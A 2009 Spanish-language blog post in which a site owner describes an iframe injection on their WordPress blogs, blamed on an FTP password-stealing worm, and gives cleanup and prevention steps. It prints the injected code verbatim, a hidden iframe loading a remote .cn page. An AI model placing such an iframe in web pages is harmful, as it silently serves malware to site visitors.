Ataques de iframe como prevenirse y como bloquearlos

Dias atras casi me vuelvo loco por un ataque masivo de <iframe> a toda la red de mis blogs, contacte al soporte, es mas a ambos soportes, pues tengo mis paginas en dos servidores diferentes y como no entiendo mucho de ingles, traté de traducirlo con el google, indague un poco y encontre cierta informacion sobre estos ataques.

Los ataques de iframe se producen generalmente por un virus interno en nuestra pc ¿como es esto? es un gusano para programas FTP, como Filezilla, Core Ftp, etc.

Lo que hace este virus es como lo haria cualquier otro, usa nuestra propia desatencion, porque generalmente lo que hacemos con los programas FTP es GUARDAR LA CONTRASEÑA, para agilizar la tarea de conectarnos a nuestro servidor, es mas yo lo hago porque no recuerdo la contraseña de mis mas de 10 sitios (eso es otra historia), entonces el virus aprovecha esto, se conecta e inserta virus malicioso en nuestro index produciendose asi una caida de nuestra web, o como en mi caso y de los blogs de wordpress algo como esto:

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/usuario/public_html/index.php on line 17

Parse error: syntax error, unexpected ‘.’ in /home/usuario/public_html/index.php on line 17

Claro que mi soporte tecnico me dijo lo mismo, ud tiene un ataque de iframe, debe realizar lo sigte:
1. No guardar las contraseñas de acceso a su cuenta (de hosting)
2. Pasar un antivirus en su pc, para eliminar cualquier virus espia, o malvare.
3. Contactar a su webmaster para corregir el codigo de su web

Dicho esto, me di cuenta que el problema no era de ellos, sino enteramente mio, entonces me baje el index.php (del theme) y busque linea a linea cual era el bendito error, y en el fondo del archivo el virus habia borrado algunas lineas y colocado un IFRAME, que tenia la sigte linea.

<iframe src=”http://bestlitevideo.cn:8080/index.php” width=133 height=120 style=”visibility: hidden”></iframe>

Entonces borre esa linea, agregue lo que habia borrado (por suerte tenia un backup del theme) y volvi a levantarlo, pero todavia no se habia solucionado, el virus modifico un par de archivos del wordpress, los index.php y otros archivos de la carpeta de inicio, entonces tuve que modificar (para prevenir) todos los archivos del wordpress.

Ahora se preguntaran como prevenir este tipo de ataques?

1. Nunca guardar la contraseña de nuestras cuentas de FTP
2. Tener siempre un backup de nuestro script, theme o nuestro web site.
3. Ante cualquier ataque, caida rara de nuestra pagina o algun error en nuestro index contactar al soporte.
4. Tener un buen antivirus y scanear semanalmente nuestra pc en busca de malvare, spybots, etc etc.
5. Ante cualquier ataque no desesperarse sino BUSCAR en google, foros, blogs y comentar nuestro problema.

Como Corregir este ataque especifico de iframe? (el mio y los parecidos)

1. Borrar la linea iframe al final de nuestro index.php (el del theme).
2. Corregir las lineas borradas por el virus y levantarlo de vuelta (o agregar directo el archivo backup)
3. Ver si el virus no ha modificado otro archivo y reemplazarlo por el correcto (el original)
4. En caso de seguir con errores, modificar el script completo y la plantilla (los backups).

Si alguno sigue con problemas, por favor dejar su comentario que trataremos de socorrerlo :)

Tambien pueden leer este post en ingles sobre Ataques Iframe

This entry was posted on Thursday, June 18th, 2009 at 1:12 pm and is filed under ayuda. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.